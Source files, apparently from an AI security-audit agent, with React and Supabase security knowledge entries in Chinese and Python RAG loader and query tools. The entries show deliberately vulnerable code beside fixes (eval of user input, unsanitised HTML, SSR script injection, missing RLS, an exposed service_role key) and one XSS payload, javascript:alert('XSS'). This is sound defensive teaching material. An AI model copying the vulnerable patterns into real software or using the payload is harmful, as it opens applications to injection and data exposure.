    id="framework_react",
    title="React Security",
    category=KnowledgeCategory.FRAMEWORK,
    tags=["react", "javascript", "frontend", "jsx"],
    content="""
React 默认对XSS有较好的防护,但仍有一些需要注意的安全问题。

## 安全特性
1. JSX自动转义
2. 虚拟DOM隔离

## 常见漏洞模式

### dangerouslySetInnerHTML
```jsx
// 危险 - 直接渲染HTML
function Comment({ content }) {
    return <div dangerouslySetInnerHTML={{ __html: content }} />;
}

// 安全 - 使用DOMPurify
import DOMPurify from 'dompurify';
function Comment({ content }) {
    return <div dangerouslySetInnerHTML={{
        __html: DOMPurify.sanitize(content)
    }} />;
}
```

### href/src注入
```jsx
// 危险 - javascript:协议
function Link({ url }) {
    return <a href={url}>Click</a>;
    // 攻击: url = "javascript:alert('XSS')"
}

// 安全 - 验证协议
function Link({ url }) {
    const safeUrl = url.startsWith('http') ? url : '#';
    return <a href={safeUrl}>Click</a>;
}
```

### eval和Function
```jsx
// 危险
function Calculator({ expression }) {
    const result = eval(expression); // RCE风险
    return <div>{result}</div>;
}

// 安全 - 使用安全的表达式解析器
import { evaluate } from 'mathjs';
function Calculator({ expression }) {
    const result = evaluate(expression);
    return <div>{result}</div>;
}
```

### 服务端渲染(SSR) XSS
```jsx
// 危险 - Next.js中
export async function getServerSideProps({ query }) {
    return {
        props: {
            search: query.q // 未转义
        }
    };
}

// 页面中
function Page({ search }) {
    return <script dangerouslySetInnerHTML={{
        __html: `window.search = "${search}"` // XSS!
    }} />;
}

// 危险 - 仅使用JSON.stringify (值中的 </script> 仍可闭合标签)
function Page({ search }) {
    return <script dangerouslySetInnerHTML={{
        __html: `window.search = ${JSON.stringify(search)}`
    }} />;
}

// 安全 - 使用JSON序列化并转义 "<"
function Page({ search }) {
    return <script dangerouslySetInnerHTML={{
        __html: `window.search = ${JSON.stringify(search).replace(/</g, '\\\\u003c')}`
    }} />;
}
```

### 敏感数据暴露
```jsx
// 危险 - 前端存储敏感数据
localStorage.setItem('token', apiToken);
localStorage.setItem('user', JSON.stringify(userData));

// 危险 - 在状态中存储敏感信息
const [creditCard, setCreditCard] = useState(cardNumber);

// 安全 - 使用HttpOnly Cookie存储token
// 敏感数据只在需要时从后端获取
```

### 依赖安全
```jsx
// 危险 - 使用有漏洞的包
import serialize from 'serialize-javascript';
// 某些版本有XSS漏洞

// 安全 - 定期审计
// npm audit
// yarn audit
```

### 环境变量泄露
```jsx
// 危险 - 暴露服务端密钥
// .env
REACT_APP_API_KEY=secret_key // 会被打包到前端!

// 安全 - 敏感密钥只在服务端使用
// 前端只使用公开的配置
```

## 安全最佳实践
1. 避免使用dangerouslySetInnerHTML
2. 验证所有URL协议
3. 不要在前端存储敏感数据
4. 使用Content Security Policy
5. 定期更新依赖
6. 使用TypeScript增强类型安全
""",
)
|
||||
|
|
@ -0,0 +1,148 @@
|
|||
"""
|
||||
Supabase 安全知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
# Markdown body of the Supabase knowledge entry. Kept as a separate constant so the
# document metadata below stays readable; the text is consumed at runtime as-is.
_SUPABASE_SECURITY_CONTENT = """
Supabase 是一个开源的Firebase替代品,安全性主要依赖于Row Level Security (RLS)。

## 核心安全机制
1. Row Level Security (RLS)
2. JWT认证
3. PostgreSQL权限系统

## 常见漏洞模式

### RLS未启用
```sql
-- 危险 - 表没有启用RLS
CREATE TABLE posts (
    id SERIAL PRIMARY KEY,
    user_id UUID,
    content TEXT
);
-- 任何人都可以访问所有数据!

-- 安全 - 启用RLS
ALTER TABLE posts ENABLE ROW LEVEL SECURITY;

CREATE POLICY "Users can only see their own posts"
    ON posts FOR SELECT
    USING (auth.uid() = user_id);
```

### RLS策略不完整
```sql
-- 危险 - 只有SELECT策略
CREATE POLICY "select_policy" ON posts FOR SELECT
    USING (auth.uid() = user_id);
-- INSERT/UPDATE/DELETE没有策略,可能被绕过

-- 安全 - 完整的CRUD策略
CREATE POLICY "insert_policy" ON posts FOR INSERT
    WITH CHECK (auth.uid() = user_id);

CREATE POLICY "update_policy" ON posts FOR UPDATE
    USING (auth.uid() = user_id);

CREATE POLICY "delete_policy" ON posts FOR DELETE
    USING (auth.uid() = user_id);
```

### 服务端密钥泄露
```javascript
// 危险 - 在前端使用service_role密钥
const supabase = createClient(url, 'service_role_key');
// service_role绕过RLS!

// 安全 - 前端只使用anon key
const supabase = createClient(url, 'anon_key');
```

### 不安全的函数
```sql
-- 危险 - SECURITY DEFINER函数
CREATE FUNCTION get_all_users()
RETURNS SETOF users
LANGUAGE sql
SECURITY DEFINER -- 以函数所有者权限执行
AS $$
    SELECT * FROM users;
$$;

-- 安全 - 使用SECURITY INVOKER或添加检查
CREATE FUNCTION get_user_data(target_user_id UUID)
RETURNS SETOF users
LANGUAGE sql
SECURITY INVOKER
AS $$
    SELECT * FROM users WHERE id = target_user_id;
$$;
```

### 存储桶权限
```sql
-- 危险 - 公开存储桶
INSERT INTO storage.buckets (id, name, public)
VALUES ('uploads', 'uploads', true);
-- 任何人都可以访问所有文件

-- 安全 - 私有存储桶 + RLS
INSERT INTO storage.buckets (id, name, public)
VALUES ('uploads', 'uploads', false);

CREATE POLICY "Users can access own files"
    ON storage.objects FOR SELECT
    USING (auth.uid()::text = (storage.foldername(name))[1]);
```

### JWT验证绕过
```javascript
// 危险 - 不验证JWT
const { data } = await supabase
    .from('posts')
    .select('*')
    .eq('user_id', userIdFromRequest); // 用户可以伪造

// 安全 - 使用auth.uid()
// RLS策略中使用auth.uid()自动从JWT获取用户ID
```

### Edge Functions安全
```typescript
// 危险 - 不验证请求来源
Deno.serve(async (req) => {
    const { userId } = await req.json();
    // 直接使用用户提供的userId
});

// 安全 - 从JWT获取用户
import { createClient } from '@supabase/supabase-js';

Deno.serve(async (req) => {
    const authHeader = req.headers.get('Authorization');
    const supabase = createClient(url, anonKey, {
        global: { headers: { Authorization: authHeader } }
    });
    const { data: { user } } = await supabase.auth.getUser();
    // 使用验证过的user.id
});
```

## 安全检查清单
1. 所有表都启用了RLS
2. 每个表都有完整的CRUD策略
3. 前端只使用anon key
4. service_role key只在服务端使用
5. 存储桶有适当的访问策略
6. 函数使用SECURITY INVOKER
7. Edge Functions验证JWT
"""

# Knowledge-base entry covering Supabase security mechanisms (RLS, keys, storage, functions).
SUPABASE_SECURITY = KnowledgeDocument(
    id="framework_supabase",
    title="Supabase Security",
    category=KnowledgeCategory.FRAMEWORK,
    tags=["supabase", "postgresql", "rls", "auth", "baas"],
    content=_SUPABASE_SECURITY_CONTENT,
)
|
||||
|
|
@ -0,0 +1,207 @@
|
|||
"""
|
||||
知识加载器 - 基于RAG的知识模块加载
|
||||
|
||||
将安全知识集成到Agent的系统提示词中
|
||||
"""
|
||||
|
||||
import logging
|
||||
from typing import List, Dict, Any, Optional
|
||||
|
||||
from .base import KnowledgeCategory
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class KnowledgeLoader:
    """
    Loads security knowledge and merges it into agent system prompts.

    All lookups are delegated to a RAG-backed knowledge store (``rag``). The
    store is expected to expose ``get_vulnerability_knowledge``, ``search``,
    ``get_all_vulnerability_types``, ``get_all_frameworks`` and a
    ``_builtin_knowledge`` list of documents with ``id``, ``tags`` and
    ``to_dict()``; those are the only members used here.
    """

    # Short names accepted by validate_modules, mapped to canonical module names.
    _MODULE_ALIASES = {
        "sql": "sql_injection",
        "sqli": "sql_injection",
        "xss": "xss_reflected",
        "auth": "auth_bypass",
        "idor": "idor",
        "ssrf": "ssrf",
        "rce": "command_injection",
        "lfi": "path_traversal",
        "xxe": "xxe",
    }

    def __init__(self, rag=None):
        """
        Args:
            rag: Knowledge store to query. When omitted, the module-level
                ``security_knowledge_rag`` singleton is used.
        """
        # Imported lazily to avoid a circular import with rag_knowledge.
        if rag is None:
            from .rag_knowledge import security_knowledge_rag
            rag = security_knowledge_rag
        self._rag = rag

    @staticmethod
    def _normalize(name: str) -> str:
        """Canonicalise a module name: trimmed, lower-case, '-' and ' ' become '_'."""
        return name.strip().lower().replace("-", "_").replace(" ", "_")

    async def load_module(self, module_name: str) -> str:
        """
        Load the content of a single knowledge module.

        Args:
            module_name: Module name (e.g. ``sql_injection``, ``xss``).

        Returns:
            The module's ``content`` field, or ``""`` when nothing was found.
        """
        knowledge = await self._rag.get_vulnerability_knowledge(module_name)
        if knowledge:
            return knowledge.get("content", "")
        return ""

    async def load_modules(self, module_names: List[str]) -> Dict[str, str]:
        """
        Load several knowledge modules.

        Args:
            module_names: Module names to load.

        Returns:
            Mapping of module name to content; modules with no content are omitted.
        """
        loaded: Dict[str, str] = {}
        for name in module_names:
            content = await self.load_module(name)
            if content:
                loaded[name] = content
        return loaded

    async def search_knowledge(
        self,
        query: str,
        top_k: int = 3,
    ) -> List[Dict[str, Any]]:
        """
        Search the knowledge store.

        Args:
            query: Free-text search query.
            top_k: Maximum number of results.

        Returns:
            Whatever the underlying store's ``search`` returns for the query.
        """
        return await self._rag.search(query, top_k=top_k)

    def build_system_prompt_with_modules(
        self,
        base_prompt: str,
        module_names: List[str],
    ) -> str:
        """
        Append built-in knowledge for the given modules to a system prompt.

        Synchronous: only the store's built-in documents are consulted.

        Args:
            base_prompt: The base system prompt.
            module_names: Names of the modules to include.

        Returns:
            ``base_prompt`` unchanged when no module resolves to a document,
            otherwise the prompt followed by a knowledge reference section.
        """
        if not module_names:
            return base_prompt

        sections: List[str] = []
        seen = set()
        for name in module_names:
            knowledge = self._get_builtin_knowledge(name)
            if not knowledge:
                continue
            section = f"### {knowledge['title']}\n{knowledge['content']}"
            # Different names can resolve to the same document (aliases, fuzzy
            # matches); include each document only once to keep the prompt short.
            if section in seen:
                continue
            seen.add(section)
            sections.append(section)

        if not sections:
            return base_prompt

        knowledge_text = "\n\n".join(sections)
        return (
            f"{base_prompt}\n"
            "\n"
            "---\n"
            "## 专业安全知识参考\n"
            "\n"
            "以下是与当前任务相关的安全知识,请在分析时参考:\n"
            "\n"
            f"{knowledge_text}\n"
            "\n"
            "---\n"
        )

    def _get_builtin_knowledge(self, module_name: str) -> Optional[Dict[str, Any]]:
        """
        Look up a built-in document by module name (synchronous).

        Tries an exact id match (with or without the ``vuln_`` prefix) first and
        then a substring match against document ids and tags.

        Returns:
            The document as a dict, or ``None`` when nothing matches.
        """
        key = self._normalize(module_name)
        # An empty key is a substring of every id and would match the first
        # document regardless of what was asked for.
        if not key:
            return None

        exact_ids = (f"vuln_{key}", key)
        for doc in self._rag._builtin_knowledge:
            if doc.id in exact_ids:
                return doc.to_dict()

        # Fuzzy match on id or tags.
        for doc in self._rag._builtin_knowledge:
            if key in doc.id or any(key in tag for tag in doc.tags):
                return doc.to_dict()

        return None

    def get_available_modules(self) -> List[str]:
        """Return the vulnerability module names reported by the knowledge store."""
        return self._rag.get_all_vulnerability_types()

    def get_all_module_names(self) -> List[str]:
        """Return every module name: vulnerability types followed by frameworks."""
        vuln_types = self._rag.get_all_vulnerability_types()
        frameworks = self._rag.get_all_frameworks()
        return vuln_types + frameworks

    def validate_modules(self, module_names: List[str]) -> Dict[str, List[str]]:
        """
        Check which module names exist in the knowledge store.

        A name is valid when, after normalisation, it is a known module, an
        alias whose target is a known module (the target is reported), or a
        substring of a known module. Empty names are always invalid.

        Args:
            module_names: Names to validate.

        Returns:
            ``{"valid": [...], "invalid": [...]}``
        """
        known = {self._normalize(m) for m in self.get_all_module_names()}

        valid: List[str] = []
        invalid: List[str] = []

        for name in module_names:
            key = self._normalize(name)
            if not key:
                # "" is a substring of everything; never treat it as a match.
                invalid.append(name)
                continue

            alias_target = self._MODULE_ALIASES.get(key)
            if key in known:
                valid.append(name)
            elif alias_target is not None and alias_target in known:
                # Only accept an alias when the module it points to really exists.
                valid.append(alias_target)
            elif any(key in module for module in known):
                valid.append(name)
            else:
                invalid.append(name)

        return {"valid": valid, "invalid": invalid}
|
||||
|
||||
|
||||
# Module-level shared instance; constructed with no arguments, so it resolves
# the default knowledge store inside KnowledgeLoader.__init__ at import time.
knowledge_loader = KnowledgeLoader()
|
||||
|
||||
|
||||
# 便捷函数
|
||||
def get_available_modules() -> List[str]:
    """Return the module names exposed by the shared ``knowledge_loader``."""
    modules = knowledge_loader.get_available_modules()
    return modules
|
||||
|
||||
|
||||
def get_module_content(module_name: str) -> Optional[str]:
    """
    Return the ``content`` of a built-in module via the shared loader (synchronous).

    Returns ``None`` when the module does not resolve to a document.
    """
    entry = knowledge_loader._get_builtin_knowledge(module_name)
    if not entry:
        return None
    return entry.get("content")
|
||||
|
|
@ -0,0 +1,322 @@
|
|||
"""
|
||||
基于RAG的安全知识检索系统
|
||||
|
||||
利用现有的RAG模块实现安全知识的向量检索
|
||||
"""
|
||||
|
||||
import logging
|
||||
from typing import List, Dict, Any, Optional
|
||||
|
||||
from .base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class SecurityKnowledgeRAG:
|
||||
"""
|
||||
安全知识RAG检索系统
|
||||
|
||||
使用现有的RAG模块进行向量检索
|
||||
"""
|
||||
|
||||
COLLECTION_NAME = "security_knowledge"
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
persist_directory: Optional[str] = None,
|
||||
):
|
||||
self.persist_directory = persist_directory
|
||||
self._indexer = None
|
||||
self._retriever = None
|
||||
self._initialized = False
|
||||
|
||||
# 内置知识库 - 从模块化文件加载
|
||||
self._builtin_knowledge = self._load_builtin_knowledge()
|
||||
|
||||
async def initialize(self):
|
||||
"""初始化RAG组件"""
|
||||
if self._initialized:
|
||||
return
|
||||
|
||||
try:
|
||||
from ...rag import CodeIndexer, CodeRetriever, EmbeddingService
|
||||
|
||||
embedding_service = EmbeddingService()
|
||||
|
||||
self._indexer = CodeIndexer(
|
||||
collection_name=self.COLLECTION_NAME,
|
||||
embedding_service=embedding_service,
|
||||
persist_directory=self.persist_directory,
|
||||
)
|
||||
|
||||
self._retriever = CodeRetriever(
|
||||
collection_name=self.COLLECTION_NAME,
|
||||
embedding_service=embedding_service,
|
||||
persist_directory=self.persist_directory,
|
||||
)
|
||||
|
||||
await self._indexer.initialize()
|
||||
await self._retriever.initialize()
|
||||
|
||||
# 检查是否需要索引内置知识
|
||||
count = await self._indexer.get_chunk_count()
|
||||
if count == 0:
|
||||
await self._index_builtin_knowledge()
|
||||
|
||||
self._initialized = True
|
||||
logger.info("SecurityKnowledgeRAG initialized")
|
||||
|
||||
except Exception as e:
|
||||
logger.warning(f"Failed to initialize RAG: {e}, using fallback")
|
||||
self._initialized = True # 标记为已初始化,使用fallback
|
||||
|
||||
def _load_builtin_knowledge(self) -> List[KnowledgeDocument]:
|
||||
"""从模块化文件加载内置安全知识"""
|
||||
all_docs = []
|
||||
|
||||
# 加载漏洞知识
|
||||
try:
|
||||
from .vulnerabilities import ALL_VULNERABILITY_DOCS
|
||||
all_docs.extend(ALL_VULNERABILITY_DOCS)
|
||||
logger.debug(f"Loaded {len(ALL_VULNERABILITY_DOCS)} vulnerability docs")
|
||||
except ImportError as e:
|
||||
logger.warning(f"Failed to load vulnerability docs: {e}")
|
||||
|
||||
# 加载框架知识
|
||||
try:
|
||||
from .frameworks import ALL_FRAMEWORK_DOCS
|
||||
all_docs.extend(ALL_FRAMEWORK_DOCS)
|
||||
logger.debug(f"Loaded {len(ALL_FRAMEWORK_DOCS)} framework docs")
|
||||
except ImportError as e:
|
||||
logger.warning(f"Failed to load framework docs: {e}")
|
||||
|
||||
logger.info(f"Total knowledge documents loaded: {len(all_docs)}")
|
||||
return all_docs
|
||||
|
||||
async def _index_builtin_knowledge(self):
|
||||
"""索引内置知识到向量数据库"""
|
||||
if not self._indexer:
|
||||
return
|
||||
|
||||
logger.info("Indexing builtin security knowledge...")
|
||||
|
||||
# 转换为RAG可索引的格式
|
||||
files = []
|
||||
for doc in self._builtin_knowledge:
|
||||
files.append({
|
||||
"path": f"knowledge/{doc.category.value}/{doc.id}.md",
|
||||
"content": doc.to_embedding_text(),
|
||||
})
|
||||
|
||||
async for progress in self._indexer.index_files(files, base_path="knowledge"):
|
||||
pass
|
||||
|
||||
logger.info(f"Indexed {len(files)} knowledge documents")
|
||||
|
||||
async def search(
|
||||
self,
|
||||
query: str,
|
||||
category: Optional[KnowledgeCategory] = None,
|
||||
top_k: int = 5,
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""
|
||||
搜索安全知识
|
||||
|
||||
Args:
|
||||
query: 搜索查询
|
||||
category: 知识类别过滤
|
||||
top_k: 返回数量
|
||||
|
||||
Returns:
|
||||
匹配的知识文档列表
|
||||
"""
|
||||
await self.initialize()
|
||||
|
||||
# 如果RAG可用,使用向量检索
|
||||
if self._retriever:
|
||||
try:
|
||||
results = await self._retriever.retrieve(
|
||||
query=query,
|
||||
top_k=top_k,
|
||||
)
|
||||
|
||||
return [
|
||||
{
|
||||
"id": r.chunk_id,
|
||||
"content": r.content,
|
||||
"score": r.score,
|
||||
"file_path": r.file_path,
|
||||
}
|
||||
for r in results
|
||||
]
|
||||
except Exception as e:
|
||||
logger.warning(f"RAG search failed: {e}, using fallback")
|
||||
|
||||
# Fallback: 简单关键词匹配
|
||||
return self._fallback_search(query, category, top_k)
|
||||
|
||||
def _fallback_search(
|
||||
self,
|
||||
query: str,
|
||||
category: Optional[KnowledgeCategory],
|
||||
top_k: int,
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""简单的关键词匹配搜索(fallback)"""
|
||||
query_lower = query.lower()
|
||||
query_terms = query_lower.split()
|
||||
results = []
|
||||
|
||||
for doc in self._builtin_knowledge:
|
||||
if category and doc.category != category:
|
||||
continue
|
||||
|
||||
# 计算匹配分数
|
||||
score = 0
|
||||
content_lower = doc.content.lower()
|
||||
title_lower = doc.title.lower()
|
||||
|
||||
# 标题匹配权重更高
|
||||
for term in query_terms:
|
||||
if term in title_lower:
|
||||
score += 0.3
|
||||
if term in content_lower:
|
||||
score += 0.1
|
||||
|
||||
# 完整查询匹配
|
||||
if query_lower in title_lower:
|
||||
score += 0.5
|
||||
if query_lower in content_lower:
|
||||
score += 0.2
|
||||
|
||||
# 标签匹配
|
||||
for tag in doc.tags:
|
||||
if query_lower in tag.lower() or any(t in tag.lower() for t in query_terms):
|
||||
score += 0.15
|
||||
|
||||
# CWE/OWASP匹配
|
||||
for cwe in doc.cwe_ids:
|
||||
if query_lower in cwe.lower():
|
||||
score += 0.25
|
||||
for owasp in doc.owasp_ids:
|
||||
if query_lower in owasp.lower():
|
||||
score += 0.25
|
||||
|
||||
if score > 0:
|
||||
results.append({
|
||||
"id": doc.id,
|
||||
"title": doc.title,
|
||||
"content": doc.content,
|
||||
"category": doc.category.value,
|
||||
"score": min(score, 1.0),
|
||||
"tags": doc.tags,
|
||||
"cwe_ids": doc.cwe_ids,
|
||||
"severity": doc.severity,
|
||||
})
|
||||
|
||||
# 按分数排序
|
||||
results.sort(key=lambda x: x["score"], reverse=True)
|
||||
return results[:top_k]
|
||||
|
||||
async def get_vulnerability_knowledge(
|
||||
self,
|
||||
vuln_type: str,
|
||||
) -> Optional[Dict[str, Any]]:
|
||||
"""
|
||||
获取特定漏洞类型的知识
|
||||
|
||||
Args:
|
||||
vuln_type: 漏洞类型(如sql_injection, xss等)
|
||||
|
||||
Returns:
|
||||
漏洞知识文档
|
||||
"""
|
||||
# 标准化漏洞类型名称
|
||||
vuln_type_normalized = vuln_type.lower().replace("-", "_").replace(" ", "_")
|
||||
|
||||
# 先尝试精确匹配
|
||||
for doc in self._builtin_knowledge:
|
||||
if doc.id == f"vuln_{vuln_type_normalized}" or doc.id == vuln_type_normalized:
|
||||
return doc.to_dict()
|
||||
|
||||
# 尝试部分匹配
|
||||
for doc in self._builtin_knowledge:
|
||||
if vuln_type_normalized in doc.id:
|
||||
return doc.to_dict()
|
||||
|
||||
# 使用搜索
|
||||
results = await self.search(vuln_type, top_k=1)
|
||||
return results[0] if results else None
|
||||
|
||||
async def get_framework_knowledge(
|
||||
self,
|
||||
framework: str,
|
||||
) -> Optional[Dict[str, Any]]:
|
||||
"""
|
||||
获取特定框架的安全知识
|
||||
|
||||
Args:
|
||||
framework: 框架名称(如fastapi, django等)
|
||||
|
||||
Returns:
|
||||
框架安全知识文档
|
||||
"""
|
||||
framework_normalized = framework.lower().replace("-", "_").replace(" ", "_")
|
||||
|
||||
for doc in self._builtin_knowledge:
|
||||
if doc.category == KnowledgeCategory.FRAMEWORK:
|
||||
if doc.id == f"framework_{framework_normalized}" or framework_normalized in doc.id:
|
||||
return doc.to_dict()
|
||||
|
||||
# 使用搜索
|
||||
results = await self.search(framework, category=KnowledgeCategory.FRAMEWORK, top_k=1)
|
||||
return results[0] if results else None
|
||||
|
||||
def get_all_vulnerability_types(self) -> List[str]:
    """
    Return the names of all built-in vulnerability documents.

    Each name is the document id with a leading ``vuln_`` removed. Only the
    prefix is stripped, so an id that contains ``vuln_`` again further in is
    not mangled. Ids without the prefix are returned unchanged.
    """
    prefix = "vuln_"
    return [
        doc.id[len(prefix):] if doc.id.startswith(prefix) else doc.id
        for doc in self._builtin_knowledge
        if doc.category == KnowledgeCategory.VULNERABILITY
    ]
|
||||
|
||||
def get_all_frameworks(self) -> List[str]:
    """
    Return the names of all built-in framework documents.

    Each name is the document id with a leading ``framework_`` removed. Only
    the prefix is stripped; ids without it are returned unchanged.
    """
    prefix = "framework_"
    return [
        doc.id[len(prefix):] if doc.id.startswith(prefix) else doc.id
        for doc in self._builtin_knowledge
        if doc.category == KnowledgeCategory.FRAMEWORK
    ]
|
||||
|
||||
def get_knowledge_by_tags(self, tags: List[str]) -> List[Dict[str, Any]]:
    """
    Return every built-in document that carries at least one of ``tags``.

    Matching is case-insensitive on whole tags. Documents are returned as
    dicts, in knowledge-base order, each at most once.
    """
    wanted = [tag.lower() for tag in tags]
    matches = []

    for entry in self._builtin_knowledge:
        entry_tags = [tag.lower() for tag in entry.tags]
        for candidate in wanted:
            if candidate in entry_tags:
                matches.append(entry.to_dict())
                break  # one shared tag is enough

    return matches
|
||||
|
||||
def get_knowledge_stats(self) -> Dict[str, Any]:
    """
    Summarise the built-in knowledge base.

    Returns:
        A dict with ``total`` (number of documents), ``by_category``
        (count per ``category.value``) and ``by_severity`` (count per
        severity; documents with a falsy severity are not counted).
    """
    category_counts = {}
    severity_counts = {}

    for entry in self._builtin_knowledge:
        label = entry.category.value
        category_counts[label] = category_counts.get(label, 0) + 1

        level = entry.severity
        if level:
            severity_counts[level] = severity_counts.get(level, 0) + 1

    return {
        "total": len(self._builtin_knowledge),
        "by_category": category_counts,
        "by_severity": severity_counts,
    }
|
||||
|
||||
|
||||
# Global instance: a single SecurityKnowledgeRAG created when this module is
# imported.
security_knowledge_rag = SecurityKnowledgeRAG()
|
||||
|
|
@ -0,0 +1,257 @@
|
|||
"""
|
||||
知识查询工具 - 让Agent可以在运行时查询安全知识
|
||||
|
||||
基于RAG的知识检索工具
|
||||
"""
|
||||
|
||||
import logging
|
||||
from typing import Dict, Any, Optional, List, Type
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from ..tools.base import AgentTool, ToolResult
|
||||
from .rag_knowledge import security_knowledge_rag, KnowledgeCategory
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
# Argument schema returned by SecurityKnowledgeQueryTool.args_schema: a
# free-text query, an optional category filter and a result count.
# NOTE(review): the class docstring is kept verbatim — pydantic may expose a
# model docstring as the schema description, so translating it could change
# what the agent sees; confirm before editing.
class SecurityKnowledgeQueryInput(BaseModel):
    """安全知识查询输入"""
    # Required search text.
    query: str = Field(..., description="搜索查询,如漏洞类型、技术名称、安全概念等")
    # Optional category name; defaults to None (no filter requested).
    category: Optional[str] = Field(
        None,
        description="知识类别过滤: vulnerability, best_practice, remediation, code_pattern, compliance"
    )
    # Number of results to return; default 3, constrained to 1..10 via ge/le.
    top_k: int = Field(3, description="返回结果数量", ge=1, le=10)
|
||||
|
||||
|
||||
class SecurityKnowledgeQueryTool(AgentTool):
    """
    Agent tool that runs a free-text search over the security knowledge base.

    Used to look up vulnerability knowledge, best practices and remediation
    advice at run time.
    """

    @property
    def name(self) -> str:
        return "query_security_knowledge"

    @property
    def description(self) -> str:
        return """查询安全知识库,获取漏洞类型、检测方法、修复建议等专业知识。

使用场景:
- 需要了解某种漏洞类型的详细信息
- 查找安全最佳实践
- 获取修复建议
- 了解特定技术的安全考量

示例查询:
- "SQL injection detection methods"
- "XSS prevention best practices"
- "SSRF vulnerability patterns"
- "hardcoded credentials"
"""

    @property
    def args_schema(self) -> Type[BaseModel]:
        return SecurityKnowledgeQueryInput

    @staticmethod
    def _format_result(index: int, result: Dict[str, Any]) -> str:
        """Render one search hit as a markdown section."""
        formatted = f"### 结果 {index}"
        if result.get("title"):
            formatted += f": {result['title']}"
        formatted += f"\n相关度: {result.get('score', 0):.2f}\n"
        if result.get("tags"):
            formatted += f"标签: {', '.join(result['tags'])}\n"
        if result.get("cwe_ids"):
            formatted += f"CWE: {', '.join(result['cwe_ids'])}\n"
        formatted += f"\n{result.get('content', '')}"
        return formatted

    async def _execute(
        self,
        query: str,
        category: Optional[str] = None,
        top_k: int = 3,
    ) -> ToolResult:
        """
        Search the knowledge base and format the hits for the agent.

        Args:
            query: Free-text search query.
            category: Optional ``KnowledgeCategory`` value. An unrecognised
                value does not fail the call: the search runs unfiltered,
                a warning is logged and the value is reported under
                ``metadata["ignored_category"]``.
            top_k: Maximum number of results to return.

        Returns:
            A successful ``ToolResult`` with markdown text (or a "nothing
            found" message), or a failed ``ToolResult`` if the search raised.
        """
        try:
            # Convert the category string into the enum the search expects.
            knowledge_category = None
            ignored_category = None
            if category:
                try:
                    knowledge_category = KnowledgeCategory(category.strip().lower())
                except ValueError:
                    # Best effort: keep searching, but make the dropped
                    # filter visible instead of swallowing it silently.
                    ignored_category = category
                    logger.warning(
                        "Unknown knowledge category %r; searching all categories",
                        category,
                    )

            results = await security_knowledge_rag.search(
                query=query,
                category=knowledge_category,
                top_k=top_k,
            )

            metadata: Dict[str, Any] = {"query": query, "results_count": len(results)}
            if ignored_category is not None:
                metadata["ignored_category"] = ignored_category

            if not results:
                return ToolResult(
                    success=True,
                    data="未找到相关的安全知识。请尝试使用不同的关键词。",
                    metadata=metadata,
                )

            formatted_results = [
                self._format_result(i, result)
                for i, result in enumerate(results, 1)
            ]
            output = f"找到 {len(results)} 条相关知识:\n\n" + "\n\n---\n\n".join(formatted_results)

            metadata["results"] = results
            return ToolResult(
                success=True,
                data=output,
                metadata=metadata,
            )

        except Exception as e:
            # Keep the traceback in the log; the agent only gets the message.
            logger.error("Knowledge query failed: %s", e, exc_info=True)
            return ToolResult(
                success=False,
                error=f"知识查询失败: {str(e)}",
            )
|
||||
|
||||
|
||||
# Argument schema returned by GetVulnerabilityKnowledgeTool.args_schema.
# NOTE(review): the class docstring is kept verbatim — pydantic may expose a
# model docstring as the schema description; confirm before translating.
class VulnerabilityKnowledgeInput(BaseModel):
    """漏洞知识查询输入"""
    # Required vulnerability type name; the description lists example values.
    vulnerability_type: str = Field(
        ...,
        description="漏洞类型,如: sql_injection, xss, command_injection, path_traversal, ssrf, deserialization, hardcoded_secrets, auth_bypass"
    )
|
||||
|
||||
|
||||
class GetVulnerabilityKnowledgeTool(AgentTool):
    """
    Agent tool that returns the full knowledge document for one
    vulnerability type: overview, dangerous patterns, detection hints and
    remediation guidance.
    """

    @property
    def name(self) -> str:
        return "get_vulnerability_knowledge"

    @property
    def description(self) -> str:
        return """获取特定漏洞类型的完整专业知识。

支持的漏洞类型:
- sql_injection: SQL注入
- xss: 跨站脚本攻击
- command_injection: 命令注入
- path_traversal: 路径遍历
- ssrf: 服务端请求伪造
- deserialization: 不安全的反序列化
- hardcoded_secrets: 硬编码凭证
- auth_bypass: 认证绕过

返回内容包括:
- 漏洞概述和危害
- 危险代码模式
- 检测方法
- 安全实践
- 修复示例
"""

    @property
    def args_schema(self) -> Type[BaseModel]:
        return VulnerabilityKnowledgeInput

    async def _execute(self, vulnerability_type: str) -> ToolResult:
        """
        Fetch and format the knowledge document for ``vulnerability_type``.

        Returns:
            A successful ``ToolResult`` with the formatted document, or with
            the list of available types when nothing matches; a failed
            ``ToolResult`` if the lookup raised.
        """
        try:
            knowledge = await security_knowledge_rag.get_vulnerability_knowledge(
                vulnerability_type
            )

            if not knowledge:
                available = security_knowledge_rag.get_all_vulnerability_types()
                return ToolResult(
                    success=True,
                    data=f"未找到漏洞类型 '{vulnerability_type}' 的知识。\n\n可用的漏洞类型: {', '.join(available)}",
                    metadata={"available_types": available},
                )

            # `or` rather than a .get() default: the key can be present with
            # a None/empty value, which would otherwise be printed as "None".
            title = knowledge.get("title") or vulnerability_type
            severity = knowledge.get("severity") or "N/A"

            output_parts = [
                f"# {title}",
                f"严重程度: {severity}",
            ]

            if knowledge.get("cwe_ids"):
                output_parts.append(f"CWE: {', '.join(knowledge['cwe_ids'])}")
            if knowledge.get("owasp_ids"):
                output_parts.append(f"OWASP: {', '.join(knowledge['owasp_ids'])}")

            output_parts.append("")
            output_parts.append(knowledge.get("content") or "")

            return ToolResult(
                success=True,
                data="\n".join(output_parts),
                metadata=knowledge,
            )

        except Exception as e:
            # Keep the traceback in the log; the agent only gets the message.
            logger.error("Get vulnerability knowledge failed: %s", e, exc_info=True)
            return ToolResult(
                success=False,
                error=f"获取漏洞知识失败: {str(e)}",
            )
|
||||
|
||||
|
||||
# Argument schema returned by ListKnowledgeModulesTool.args_schema.
# NOTE(review): the class docstring is kept verbatim — pydantic may expose a
# model docstring as the schema description; confirm before translating.
class ListKnowledgeModulesInput(BaseModel):
    """列出知识模块输入"""
    # Optional category name; defaults to None (no filter requested).
    category: Optional[str] = Field(
        None,
